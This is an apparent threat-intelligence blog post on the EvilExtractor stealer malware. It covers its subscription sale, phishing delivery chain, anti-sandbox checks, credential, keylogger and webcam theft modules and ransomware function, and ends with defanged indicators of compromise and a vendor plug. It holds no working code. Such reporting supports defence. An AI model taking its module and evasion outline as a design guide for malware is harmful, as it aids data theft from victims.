EvilExtractor Stealer Malware Attacks Peaked in March 2023

EvilExtractor (or Evil Extractor), a data theft tool, is trending in Europe and the United States due to an uptick in attacks.

EvilExtractor is provided as if it is a legitimate tool on a subscription basis by its developer(s), Kodex; however, researchers have reported that the tool has been promoted to threat actors on various hacking forums since 2022.

According to Fortinet, the EvilExtractor stealer malware is used by attackers in the wild, and the statistics show that the malware’s deployment peaked in March 2023. 

What Is EvilExtractor?

EvilExtractor malware affects Windows systems, and attackers utilize it mainly for stealing browser data and other sensitive information. Kodex released the malware in October 2022 and has since been updating it.

Malicious actors can use the seven attack modules included in the EvilExtractor tool, such as credential extraction, ransomware, and Windows Defender bypassing, for $59 per month.

The following modules are part of the EvilExtractor version used in these attacks:

• Date time checking
• Anti-Sandbox
• Anti-VM
• Anti-Scanner
• FTP server setting
• Steal data
• Upload Stolen data
• Clear log
• Ransomware

How Does EvilExtractor Affect?

Most infections were caused by a phishing campaign in which attackers dropped a Python executable. Fortinet discovered several attacks masquerading as account confirmation requests, each with a gzip-compressed executable attachment. This executable is designed to look like a legitimate PDF or Dropbox file.

When the target opens the file, a PyInstaller file is executed, which launches a .NET loader that launches an EvilExtractor executable using a base64-encoded PowerShell script.

The malware will check the system time and hostname on initial launch to determine whether it is running in a virtual environment or a sandbox, in which case it will exit.

The data-stealing module of EvilExtractor downloads three additional Python components: 

KK2023.zip: It extracts cookies from several web browsers and also collects browsing history and saved passwords from a wider range of programs. 

Confirm.zip: This module is a keylogger that records keyboard inputs and saves them in a local folder for later exfiltration. 

MnMs.zip: This component is a webcam extractor that secretly activates the webcam, captures videos or images, and uploads them to the attacker’s FTP server, which Kodex rents.

The malware also steals many types of documents and media files from the Desktop and Downloads folders, takes screenshots, and sends all the stolen data to the attackers.

Kodex Ransomware 

EvilExtractor also has a ransomware function that uses a PowerShell script extracted from the .Net loader. 

The loader contains the ‘Kodex ransomware’ module, which can download a file (“zzyy.zip“) from evilextractor[.]com. 

This tool utilizes 7-Zip to generate a password-secured archive of the victim’s files, making them inaccessible without the correct password.

Indicators of Compromise (IOC) Related to EvilExtractor

IP Addresses:

• 45[.]87[.]81[.]184
• 193[.]42[.]33[.]232

File Hash:

• 352efd1645982b8d23a841107007c8b4b024eb6bb5d6b312e5783ce4aa62b685
• 023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e
• 75688c32a3c1f04df0fc02491180c8079d7fdc0babed981f5860f22f5e118a5e
• 826c7c112dd1ae80469ef81f5066003d7691a349e6234c8f8ca9637b0984fc45
• b1ef1654839b73f03b73c4ef4e20ce4ecdef2236ec6e1ca36881438bc1758dcd
• 17672795fb0c8df81ab33f5403e0e8ed15f4b2ac1e8ac9fef1fec4928387a36d

Stay Updated on IOCs with SOCRadar

SOCRadar is constantly looking for potential threats to deliver actionable intelligence that will safeguard your organization. Check out the Threat Actor/Malware tab on the platform to stay up to date on the most recent threat activity, mentions, and indicators of compromise. You can also utilize the Threat Feed/IOC service to stay informed of new trends through easily customizable collections.